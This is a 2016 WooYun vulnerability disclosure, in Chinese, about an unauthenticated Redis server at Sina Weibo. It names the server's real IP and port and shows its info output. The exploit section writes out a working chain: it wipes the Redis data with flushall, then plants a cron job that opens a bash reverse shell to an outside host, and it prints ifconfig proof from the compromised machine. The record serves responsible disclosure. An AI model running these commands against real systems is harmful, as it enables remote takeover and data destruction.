当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0195480

漏洞标题:新浪微博某服务器控制不当(可远程SHELL)

相关厂商:新浪微博

漏洞作者: 猪猪侠

提交时间:2016-04-12 16:06

修复时间:2016-05-28 11:10

公开时间:2016-05-28 11:10

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-12: 细节已通知厂商并且等待厂商处理中
2016-04-13: 厂商已经确认,细节仅向厂商公开
2016-04-23: 细节向核心白帽子及相关领域专家公开
2016-05-03: 细节向普通白帽子公开
2016-05-13: 细节向实习白帽子公开
2016-05-28: 细节向公众公开

简要描述:

新浪微博某服务器直接弹个SHELL这样,SQL注入就先不发了
看到某个/opt/dbbackup目录里面有个weibo_user, weibo_data的msyql数据库目录,惊呆了

详细说明:

#1 漏洞服务器
zhaopin.weibo.cn
zhaopin.weibo.com
renmai.weibo.com
redis: 59.151.119.139
port: 7377
#2 info
redis-cli -h 59.151.119.139 -p 7377 > info

redis 59.151.119.139:7377> info
# Server
redis_version:2.6.16
redis_git_sha1:00000000
redis_git_dirty:0
redis_mode:standalone
os:Linux 2.6.32-358.el6.x86_64 x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.6
process_id:4043
run_id:0f89bdc9a6b581d090794c2958a66378f908ac7c
tcp_port:7377
uptime_in_seconds:3870141
uptime_in_days:44
hz:10
lru_clock:1341304
# Clients
connected_clients:94
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:2912472
used_memory_human:2.78M
used_memory_rss:47570944
used_memory_peak:12092599096

漏洞证明:

#3 exp get shell

redis-cli flushall
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root 
redis-cli save


/sbin/ifconfig
em1       Link encap:Ethernet  HWaddr B8:CA:3A:66:23:8C  
          inet addr:59.151.119.139  Bcast:59.151.119.143  Mask:255.255.255.240
          inet6 addr: fe80::baca:3aff:fe66:238c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:39369206 errors:0 dropped:0 overruns:0 frame:0
          TX packets:25652875 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3482359996 (3.2 GiB)  TX bytes:3912378525 (3.6 GiB)
          Memory:dcb00000-dcc00000 
em2       Link encap:Ethernet  HWaddr B8:CA:3A:66:23:8D  
          inet addr:192.168.119.139  Bcast:192.168.119.255  Mask:255.255.255.0
          inet6 addr: fe80::baca:3aff:fe66:238d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1470362969 errors:0 dropped:0 overruns:0 frame:0
          TX packets:773443973 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:125737431825 (117.1 GiB)  TX bytes:83544898974 (77.8 GiB)
          Memory:dcc00000-dcd00000 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:482626975 errors:0 dropped:0 overruns:0 frame:0
          TX packets:482626975 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:42841400037 (39.8 GiB)  TX bytes:42841400037 (39.8 GiB)


#4 证明

db1.jpg


db2.jpg

修复方案:

# 加入访问控制

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2016-04-13 11:03

厂商回复:

感谢关注新浪安全,将通知合作方修复此问题。

最新状态:

暂无